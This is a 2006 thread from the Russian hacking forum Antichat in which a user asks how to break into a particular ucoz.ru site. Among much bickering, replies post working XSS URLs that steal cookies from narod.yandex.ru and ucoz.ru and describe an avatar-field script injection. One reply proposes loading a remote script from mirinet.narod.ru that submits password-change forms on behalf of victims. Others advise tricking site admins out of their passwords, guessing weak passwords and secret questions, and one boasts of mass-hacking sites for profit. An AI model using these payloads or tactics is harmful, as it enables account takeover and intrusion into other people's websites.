Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   Болталка (https://forum.antichat.xyz/forumdisplay.php?f=46)
-   -   Взлом h1-h17.ru,narod.ru,ucoz.ru (https://forum.antichat.xyz/showthread.php?t=29053)

HOT 13.12.2006 20:57

Взлом h1-h17.ru,narod.ru,ucoz.ru
 
Вобщем сабж.
Скажите какае есть уязвимости у этих сайтов.




P.S:Хочу вломать сайт ***.ucoz.ru

Ksander 13.12.2006 21:15

на народе =)

http://narod.yandex.ru/100.xhtml?<script>alert(document.cookie)</script>

+ там еще в гослевой xss была

HOT 13.12.2006 21:22

пасибо.
А на юкосе?

Constantine 13.12.2006 23:29

А на Ucoz'e, насколько я знаю, ничего интересного сейчас нет

Robin_Hood 13.12.2006 23:45

Hot - с полгода назад там в гостевой, в тексте,
хсс была ща не знаю

$HEFF 14.12.2006 00:36

сейчас там можно восстановить пароль любого пользователя, но не админа и модера

__XT__ 14.12.2006 00:40

Ucoz
1) многочисленные перменные профайла в GET
2) попытка реализовать автоформу обламалась, так как рефере проверяеться.
Однако иожно использовать другой модуль.
К примеру поднятия прав до администрирования у определённого пользователя - сделать на это автоформу...или там автоформа на что нить...ещё
На самом деле автоформы и по сей день очень актуальны...даже там где есть защита, просто смотреть надо шире именно в open sources.
3)Помоймууязвимость загрузки в качестве аватара png файла со скриптом (класс пассивная XSS).
.....
уверен куча там ещё всего

3dn 14.12.2006 23:13

Цитата:

1) многочисленные перменные профайла в GET
абсолютная глупость, ничего из того, что нельзя узнать на странице профиля в гете не передается, куки закодированы, в гете только айди пользователя или юкзернейм передается.
Цитата:

2) попытка реализовать автоформу обламалась, так как рефере проверяеться.
судя по первому пункту, не удивительно что ОБЛАМАЛАСЬ....

Цитата:

К примеру поднятия прав до администрирования у определённого пользователя
может стоит проверить самому для начала, можно ли админа получить через автоформу, а потом советовать.... админа назначить через сайт нельзя!

Цитата:

просто смотреть надо шире именно в open sources.
наверное очень широко ты зришь, даже нашел где-то исходник укоза...... да ты крутой парень... может исходники гугла подкинешь?

Цитата:

3)Помоймууязвимость загрузки в качестве аватара png файла со скриптом (класс пассивная XSS).
по твоему это могло сработать только на допотопных браузерах.... хотя из того что ты пишешь видно, что все твои познания очень устарели...

Цитата:

уверен куча там ещё всего
если вся остальная куча в которой ты так уверен такое же "Г", то оставь ее при себе, теплее будет.

на укозе можно только юных простаков ломать, которые не могут нормальный пароль поставить и за 10 попыток их пароль подбирается.... или путем взлома почты и подбора секретного вопроса, но это может получиться если жертву знаешь, так как часто фамилию матери вводят или типа того....

__XT__, www.woweb.ru - взломай этот сайт, на укозе тоже кстати находится, раз такой великий хацкер.

kirbak 14.12.2006 23:54

Цитата:

может исходники гугла подкинешь?
Архив с клоном скинуть? :D

zl0ba 15.12.2006 00:22

Вот тебе сайты , которые расположены на одном серваке в месте с ucoz.ru/ ломай их , а потом ломай его!

Код:

1.        4tex.info       
2.        ajsberg.net         
3.        azamatus.net         
4.        allportal.net         
5.        about-myproxy.info       
6.        autofobus.info       
7.        billiardclub.info       
8.        chatica.info
9.        club-nn.com
10.        djuzer.com         
11.        elfox.net         
12.        fuck88.net         
13.        fotokuban.info       
14.        gimena-accardi.com         
15.        global-intruders.info       
16.        goodzarabotok.info       
17.        griffi.org         
18.        introid.com         
19.        ivanstroy.info       
20.        koteiki.net         
21.        keywater.info         
22.        mosobl.com         
23.        molagro.com         
24.        malahovka.net         
25.        nerr.info       
26.        neto-best.info         
27.        nnmsoft.info       
28.        ofsajt.com         
29.        orenjob.info       
30.        poceluy.info         
31.        p0.ru         
32.        pspandsmarts.net         
33.        photo-kmw.com         
34.        progress-motors.com         
35.        punkdiy.com         
36.        pingvinof.net         
37.        rugames.net         
38.        restweb.info       
39.        shoplux.net         
40.        satpilot.com         
41.        shtirlic.com         
42.        shaderworld.net         
43.        tepliystan.info         
44.        uhendus-kristuses.com         
45.        unitedrats.com         
46.        ussrteam.com         
47.        vatanweb.net         
48.        vozrojdenie.info       
49.        vedrussa.com         
50.        wlancer.net         
51.        warteens.com         
52.        winsmart24.com         
53.        xtazik.net         
54.        yrokov.net         
55.        zdravo.info


GreenBear 15.12.2006 00:40

Jah, наркоман?) Эти домены просто прикручены - движок там юкоза)

__XT__ 15.12.2006 00:51

3dn
Чё за ламос очередной=)))
Если сказал, что уязвимость в профайле именно в GET значит так и есть.
Давай я продемонстрирую XSS урле...и ты признаешь что ты ламо!-))))
бггггггггг


3)Помоймууязвимость загрузки в качестве аватара png файла со скриптом (класс пассивная XSS).

"по твоему это могло сработать только на допотопных браузерах.... хотя из того что ты пишешь видно, что все твои познания очень устарели..."
Internet Explorer <=7.0 допотопные браузеры да?
бггг посмеялся спасибо.
читай ламос: http://kodsweb.ru/texts/ie_graphics_xss.txt

и ещё нечего для тебя я взламывать не собираюсь и не потому, что ты ламос а потому что все Белошляпники рулят...всем вайт-хэдам респект!

3dn 15.12.2006 15:46

Цитата:

Давай я продемонстрирую XSS урле...и ты признаешь что ты ламо!-))))
давай если ты продемонстрируешь XSS, который куки выдергивает внедренный в сайт на укозе. Внедрить XSS нужно через дыру в системе юкоз, а не из-за дыры в голове какого-нить пользователя в системе, который позволит простым пользователям добавлять новсти с включенным HTML, то я признаю себя всем кем ты захочешь... А если у тебя ума хватает только на то, чтобы в простом URL еще и скрит прописать, то этим только ламаки могут хвастать.... Внедрить такой урл в сайт нужно, а не уметь его составлять....

Цитата:

Internet Explorer <=7.0 допотопные браузеры да?
мало того что ты не сможешь, из-за ограниченности своего ума внедрить в бинарный файл яваскрипт, так ты еще и берешься утверждать что эта дыра работает в современных браузерах.... и даже в 7 версии ИЕ.... похоже твои мозги слабо осознают всю проблему подобной дыры и если бы она была, а она действительно была года 3 назад, то людям работающим с троянами жизнь малиной бы показалась....

Цитата:

и ещё нечего для тебя я взламывать не собираюсь и не потому, что ты ламос а потому что все Белошляпники рулят...всем вайт-хэдам респект!
слова лузера, который может только языком трепать..... у тебя мозгов не хватит чтобы сайт на юкозе взломать, где так много дыр, по твоим словам.....

3dn 15.12.2006 16:04

Цитата:

Вот тебе сайты , которые расположены на одном серваке в месте с ucoz.ru/ ломай их , а потом ломай его!
да ты хохмач..... надо же такой умный, ломай говорит... :) это все сайты в системе юкоз, а если бы поумнее немного был, то смог бы подумать, что сервер не 1 и айпи у юкоза не один, а значит и доменов бы больше нашел.

p0.ru - а это вообще один из доменов укоза, также как и clan.su, my1.ru и т.д.

смотрю тут из советчиков одни детки сидят, которые не способны даже на главную страницу укоза зайти и посмотреть на сайты в колонке слева и текст почитать, чтобы понять что такое укоз.... но советы по взлому давать горазды.

вам только сайты на народе ломать и пхп нюку по уже известным дырам.

HOT, хочешь взломать, разводи админа сайта на пароль хитростями.... совет по взлому самой системы ты тут на найдешь, не тот уровень здешних хацкеров, чтобы предложить что-то достойное, они даже с укозом не знакомы.... а как можно взломать то, в чем не разбираешься???

__XT__ 15.12.2006 19:05

Цитата:

Сообщение от 3dn
давай если ты продемонстрируешь XSS, который куки выдергивает внедренный в сайт на укозе. Внедрить XSS нужно через дыру в системе юкоз, а не из-за дыры в голове какого-нить пользователя в системе, который позволит простым пользователям добавлять новсти с включенным HTML, то я признаю себя всем кем ты захочешь... А если у тебя ума хватает только на то, чтобы в простом URL еще и скрит прописать, то этим только ламаки могут хвастать.... Внедрить такой урл в сайт нужно, а не уметь его составлять....

Итак устал веселиться=))))
давай объективно:
что ты хочешь, чтобы я нашёл активную XSS на юкозе?
может как нить займусь, может найду а может и нет.
"XSS нужно через дыру в системе юкоз, а не из-за дыры в голове какого-нить пользователя в системе, который позволит простым пользователям добавлять новсти с включенным HTML, то я признаю себя всем кем ты захочешь"

Извини парень давай без оскарблений но ты рельно не понимаешь вообще о чём я.
Я не писал про добавления скриптов с помощью разрешённых html.
Выше я писал про автоформы...ты в курсе, что это?
если нет спроси у кого нить.

Цитата:

мало того что ты не сможешь, из-за ограниченности своего ума внедрить в бинарный файл яваскрипт, так ты еще и берешься утверждать что эта дыра работает в современных браузерах.... и даже в 7 версии ИЕ.... похоже твои мозги слабо осознают всю проблему подобной дыры и если бы она была, а она действительно была года 3 назад, то людям работающим с троянами жизнь малиной бы показалась....
Почему не могу...я имел ввиду про уязвимость класса Пассивиная Xss для браузера IE методом обхода граффического фильтра.
Дырка это работает как простая пассивная XSS для браузеров IE.
Проверенно на разных web приложениях.
Лучше почитай тут, уже писал:
http://forum.antichat.ru/threadedpost222134.html#post222134

"людям работающим с троянами жизнь малиной бы показалась"
а это к чему?
или ты опять меня не понял или ты вообще не в теме

Цитата:

слова лузера, который может только языком трепать..... у тебя мозгов не хватит чтобы сайт на юкозе взломать, где так много дыр, по твоим словам.....
Ну ё моё чё ты меня оскарбляешь?
ты меня не знаешь и я тебя незнаю,
приёму любую объективную критику, но не надо по киддисовски общаться я так не привык.
я просто уверен в сырости юкоза.
Если потестить оч. хорошо то найти можно много, наверняка.
Вмес то того, чтобы непонимать о чём я пишу и поносить меня сам бы протестил юкоз=)

3dn 16.12.2006 00:52

__XT__, оказывается слова "Чё за ламос очередной=)))" это не оскорбление.... ну тогда мои слова в твой адрес тоже нельзя считать оскорблениями.

Цитата:

Я не писал про добавления скриптов с помощью разрешённых html.
Выше я писал про автоформы...ты в курсе, что это?
я комментировал все что ты писал и четко отвечал по каждому пункту, поэтому не нужно говорить что ты писал, а что не писал.... Про автоформы я тоже тебе ответил.... если ты этого не заметил, то прошу перечитай мои предыдущие посты. Мало того что на укозе все значимые посты и геты передаются с сессией, а значит автоформу сделать не так уж просто, так еще и через сайт админа назначить невозможно, только через панель, а для нее автоформы вообще не работают.

Цитата:

ты меня не знаешь и я тебя незнаю
о том что ты даже понятия не имеешь кто я такой нужно было перед своими высказываниями и оскорблениями подумать....
Цитата:

я просто уверен в сырости юкоза. Если потестить оч. хорошо то найти можно много, наверняка.
так вот для начала потестить нужно, а потом заявлять о сырости....

Цитата:

приёму любую объективную критику,
как же ты про объективность можешь говорить если все твои заявления и оскорбления далеки от объективности....

Цитата:

Вмес то того, чтобы непонимать о чём я пишу и поносить меня сам бы протестил юкоз=)
на все твои замечания и утверждения я дал четкие ответы и объяснил почему ни один из твоих способов взлома сайта на юкозе не сработает, нужно внимательнее читать то, что я пишу.... а не зная юкоз как бы я делал эти комментарии?

в отличае от тебя я не делаю голословных заявлений типа что юкоз дырявый или сырой... я говорю как есть и аргументирую почему это именно так....

я заявляю, что взломать юкоз и получить пароль от сайта на юкозе у тебя не выйдет не важно как бы досконально ты его не копал....

__XT__ 16.12.2006 01:48

Цитата:

"__xt__, оказывается слова "Чё за ламос очередной=)))" это не оскорбление.... ну тогда мои слова в твой адрес тоже нельзя считать оскорблениями."
ПОсматори, я тебе не чего не писал..ты первый отпостил мне с оскарблеиями на что я ответил.

Цитата:

о том что ты даже понятия не имеешь кто я такой нужно было перед своими высказываниями и оскорблениями подумать....
А что мне думмать.Кто ты такой?
Странно когда я знакомился с организатором
хак-сцены Хаоса
он мне такого не говорил...товарищ не держал марку великого хакера=-))))
(Аггр если увидишь не смеяться=) )

Цитата:

так вот для начала потестить нужно, а потом заявлять о сырости....
а почему не заявить? или на античате только по факту уязви мости пишут...тут в первую очередь идёт обсуждения те х или иных пролблем..даже преждевременно=)



Цитата:

как же ты про объективность можешь говорить если все твои заявления и оскорбления далеки от объективности....
1)я тебя первый не оскорблял.
2)заявления старался писать объективно


Цитата:

я заявляю, что взломать юкоз и получить пароль от сайта на юкозе у тебя не выйдет не важно как бы досконально ты его не копал....
Почему не выдет?
ты так уверен в моём ламеризме=?
ну если тебе легче будет я ламос-)
я просто прикалываюсь что я хакер любительского уровня=)))


Цитата:

на все твои замечания и утверждения я дал четкие ответы и объяснил почему ни один из твоих способов взлома сайта на юкозе не сработает, нужно внимательнее читать то, что я пишу.... а не зная юкоз как бы я делал эти комментарии?
Ну видать плохо знаешь.
автоформы там реально сделать.
Xss там хватает.
пхп-инъекций я дум маю найти там не реально=_)


Цитата:

в отличае от тебя я не делаю голословных заявлений типа что юкоз дырявый или сырой... я говорю как есть и аргументирую почему это именно так....
Знаешь честно сказат ьвыражения тупое-=)
ты уверен что Юкоз защищённый?
А я заранее уверен, что он дырявый и ещё какой...докажи мне что он защищённый и докажу что он дырявый=)
Как говорил Декан кафедры Информационной Безопасноти Питерского ПОлитеха
"Безопасность - это процесс..."
...лан парень ты вмето того, чтобы отписывать мне наборы слов, лучшеб показал мне чё нить интересное на юкозе какие нить уязвимости=)))

__XT__ 16.12.2006 04:00

перед сном глянул юкоз чуток...на пассивные уязвимости.

По поводу активной XSS:
плохая фильтрация
в профайле в поле ссылки на аватуру.
Можно выполнить експлутировать скрипт
javascript: анти-киддис-бгг
vbscript: анти-киддис-бгг

(кстати неплохая активка получилась...
везде где светим аватар везде XSS)

по поводу пассивных их там оч. много.
Ну вот одна просто самая близкая, роли она практически не играет однако как пример,
что XSS там есть сойдёт=)
http://mirinet.narod.ru/ucoz_passiv.html

По поводу создания автоформ для смены пароля или е-майла, проанализировав ситуацию, что вся защита от автоформ строить в проверке реферера.
Понял, что можно експлуатировать наиболее удачную пассивную XSS
и составить запрос типа "><script src=http://mirinet.narod.ru/qwe.js></script>
где в qwe.js будет закодированная автоформа так мы обойдём единственную защиту проверку реферера.
т.к. запрос будет от юкоза=)

По поводу уязвимостей более серьёзных:
было пару подозрений на sql-inj.

всем приятных снов и пока!

3dn 16.12.2006 15:50

Цитата:

А я заранее уверен, что он дырявый и ещё какой...докажи мне что он защищённый и докажу что он дырявый=)
факт не нужно доказывать, если взломаешь, то факты будут у тебя, а пока система не взломана, то фактами располагаю я.

Цитата:

в профайле в поле ссылки на аватуру.
Можно выполнить експлутировать скрипт
javascript: анти-киддис-бгг
vbscript: анти-киддис-бгг
дай ка ссылку где ты в аватару на юкозе смог XSS засунуть. а то говорить ты горазд, это очень заментно.

Цитата:

по поводу пассивных их там оч. много.
очень много от тебя никто не просит, покажи ОДНУ.

Цитата:

По поводу создания автоформ для смены пароля или е-майла, проанализировав ситуацию, что вся защита от автоформ строить в проверке реферера.
ты даже не знаешь что пароль и мыло меняются при редактировании профиля.... если бы знал то так бы и сказал, а не разделял эти два понятия. Так вот, мало того что там реферер проверяется, там еще и айди сессии проверяется, а это значит что твоя автоформа не сработает....

Цитата:

Понял, что можно експлуатировать наиболее удачную пассивную XSS
и составить запрос типа "><script src=http://mirinet.narod.ru/qwe.js></script>
где в qwe.js будет закодированная автоформа так мы обойдём единственную защиту проверку реферера.
т.к. запрос будет от юкоза=)
ты вообще разбираешься в веб=технологиях или пишешь то что сам можешь придумать? подменить реферер можно только сервер сайд скриптом, которым весь запрос формируешь.... а если подключать яваскрипт или что угодно еще, реферер браузер сам формирует, и значит подделать его не выйдет.

Цитата:

По поводу уязвимостей более серьёзных:
было пару подозрений на sql-inj.
чудо, ты хоть понимаешь что, для того чтобы делать SQL инъекции нужно знать структуру базы, название полей и т.д., а для этого нужно исходники изучать....

Твой каждый пост только показывает всю твою малограмотность в веб-технологиях.

Пока ты не продемонстрируешь хоть 1 рабочую дыру на юкозе, будь то XSS через png или аватар или BBкод или что-то еще, или сможешь соорудить рабочую автоформу ты будешь оставаться просто лаптем, который ничего кроме как ляпать не умеет....

Пойми, за нашим разговором следят и другие люди, и они прекрасно видят кто есть кто... так что можешь писать что тебе смешно читать мои сообщения, другие то смеются над тобой...... столько слов про уязвимости юкоза и нулевой результат.

__XT__ 17.12.2006 00:08

Цитата:

факт не нужно доказывать, если взломаешь, то факты будут у тебя, а пока система не взломана, то фактами располагаю я.
=)))) ой блин сколькож тут киди-_)__)))))
А кто сказал, что Ucoz CMS не кто не ломал?
если ты не знаешь, то незначит, что его не ломали.
Повторю, докажи, что данная CMS неуязвима и я докажу тебе, что она уязвима=)))


Цитата:

Цитата:
в профайле в поле ссылки на аватуру.
Можно выполнить експлутировать скрипт
javascript: анти-киддис-бгг
vbscript: анти-киддис-бгг


дайка ссылку где ты в аватару на юкозе смог XSS засунуть. а то говорить ты горазд, это очень заментно.
В профайле видишь "Аватар (www адрес):"
Дальше не спрашивай, что к чему...т.к. активную XSS показал, кое кто поймёт как обхадить фильтрацию нужных символов а киддисам и знать не надо.

Цитата:

очень много от тебя никто не просит, покажи ОДНУ.
Ну ты чё мой пост не видел, посматри выше где я привёл пассивную XSS на Юкозе.
Через автоформу Постом ударяем по пасивке=)))
http://mirinet.narod.ru/ucoz_passiv.html


Цитата:

ты даже не знаешь что пароль и мыло меняются при редактировании профиля.... если бы знал то так бы и сказал, а не разделял эти два понятия. Так вот, мало того что там реферер проверяется, там еще и айди сессии проверяется, а это значит что твоя автоформа не сработает....
ой блин.....всё немогу
просто дикая чушь.
ты понимаешь вообще суть автоформ?
даёшь жертве линк на страничку на которой постом отправляеться запрос на смену пароля или ещё чего нить.
Ну дак вот
посматри в форме профайла какие перменные?
где ты там айди сессии увидел?
Даже если сессию проверяют ...уязвимость не теряеться...т.к. жертва сама не зная того меняет у себя пароль (при условии что она авторизирована)
вот меня пока блокирнуло то, что система проверяет реферер..при запуске автоформы сайт мне вернул:
"You are trying to do illegal action!"

Цитата:

ты вообще разбираешься в веб=технологиях или пишешь то что сам можешь придумать? подменить реферер можно только сервер сайд скриптом, которым весь запрос формируешь.... а если подключать яваскрипт или что угодно еще, реферер браузер сам формирует, и значит подделать его не выйдет.
нет я просто люблю выдуммывать=)



Цитата:

чудо, ты хоть понимаешь что, для того чтобы делать SQL инъекции нужно знать структуру базы, название полей и т.д., а для этого нужно исходники изучать....

Твой каждый пост только показывает всю твою малограмотность в веб-технологиях.

Пока ты не продемонстрируешь хоть 1 рабочую дыру на юкозе, будь то XSS через png или аватар или BBкод или что-то еще, или сможешь соорудить рабочую автоформу ты будешь оставаться просто лаптем, который ничего кроме как ляпать не умеет....

Пойми, за нашим разговором следят и другие люди, и они прекрасно видят кто есть кто... так что можешь писать что тебе смешно читать мои сообщения, другие то смеются над тобой...... столько слов про уязвимости юкоза и нулевой результат.
=0))) супер!


===
Слушай меня терзают мутные сомнения=)))
ты случаем не один из моих знакомых, который решил поприкалываться на домной?
если так то ты реально меня достал...респект=)

Если нет - Давай закроем нашу дисскусию, т.к. народу неинтересны наши тупые припинания, он и так сделал выводы...если хочешь я соглашусь что ты прав а я ламер=) стучи 243122140 пообщаемся

KUELLER 18.12.2006 13:08

пла сериал нах снять моно о_0
3dn ты случаем не сотрудник юсоса???о_0

...иль для фрикол ником выпрал их томен?о_0

Draugdur 19.12.2006 23:38

3dn либо реально один из их кодеров,который считает,что его система совершенна или лопух,котрый хочет узнать баги юкоза или параноик какой-то,но если честно ведёт себя не очень адекватно и даже агрессивно. Чувак,релакс =)

3dn 20.12.2006 01:38

Цитата:

или лопух,котрый хочет узнать баги юкоза
вот вот.... но никто мне этих багов не может показать....

Dmitriy507 20.12.2006 03:30

а с джином как?

KUELLER 20.12.2006 06:11

кодер лопух который ищет баги чтоб их закрыть? о_0


ЗЫ.про юкоз кажись писали что не фильтрует знак @ о_0

Macro 20.12.2006 09:43

А я знаю sql-инъекцию на укозе на главном сайте...

3dn 20.12.2006 18:52

Цитата:

А я знаю sql-инъекцию на укозе на главном сайте...
круто, тогда ты можешь их нехило поиметь....

Цитата:

ЗЫ.про юкоз кажись писали что не фильтрует знак @ о_0
кому нужны твои "кажись"? значешь - говори, не знаешь - молчи!

InferNo23 20.12.2006 18:59

3dn вот xss на главном сайте 6
http://www.ucoz.ru/main/?a=checkdom;login=%22%3E%3Cscript%3Ealert(document .cookie)%3C/script%3E

~Real F@ck!~ 20.12.2006 19:09

Цитата:

Сообщение от Ksander
на народе =)

http://narod.yandex.ru/100.xhtml?<script>alert(document.cookie)</script>

+ там еще в гослевой xss была

Спасиб. Незнал про это.

KUELLER 21.12.2006 06:32

3dn цуко командир нашелся оффтопер нах

3dn 21.12.2006 16:12

Цитата:

http://www.ucoz.ru/main/?a=checkdom;login=%22%3E%3Cscript%3Ealert(document .cookie)%3C/script%3E
жаль что с ее помощью ничего не получишь полезного... хотя XSS на лицо, минус в сторону укоза...

Цитата:

3dn цуко командир нашелся оффтопер нах
ты лузер, который ничего по теме сказать не может, только оффтопить ума хватает....

Dmitriy507 22.12.2006 03:43

а меня ктонибудь слышал? как на счет джино и by.ru?

3dn 22.12.2006 15:34

Цитата:

а меня ктонибудь слышал? как на счет джино и by.ru?
димон, ты что-то совсем не думаешь.... на джино ставят разные скрипты, там не система управления, как на юкозе.... если хочешь взломать сайт на джино и при этом он используюет какю-то систему управления (скорее всего бесплатную и с кучей дыр), то для начала выясни что за система а потом ищи по информацию по ее дырам. Помнится, мы ломали тысячи сайтов автоматом, которые использовали пхпнюку (в корыстных целях, конечноже, а не для удовольствия).

По поводу бай.ру, то там нельзя скрипты ставить, а значит ломать нечего, разве что весь сервер, но система старая и все дыры уже давно закрыли, да и если ты тут вопросы задаешь, то про взлом сервера тебе даже отдаленно думать не стоит.

Dmitriy507 24.12.2006 05:34

понятно.
Почему это не стоит?!

Termin@L 01.01.2007 19:47

http://www.ucoz.ru/main/?a=checkdom;login=%22%3E%3Cscript%3Ealert(document .cookie)%3C/script%3E - дыру по ходу дела уже залатали, там видно htmlspecialchar() поставили на эту переменную, поэтому тэги не вставитить...

3dn 03.01.2007 01:41

Цитата:

по ходу дела уже залатали
Xss на юкоз вообще бестолковое занятие, кража кука ничего не даст, так как воспользоватся им не получится, там привязка к айпи и не только... а приведенный выше пример Xss лишь показал, что на юкозе все же можно найти возможность сделать какую-нибудь Xssку... но толку от таких Xss нет.


Время: 16:28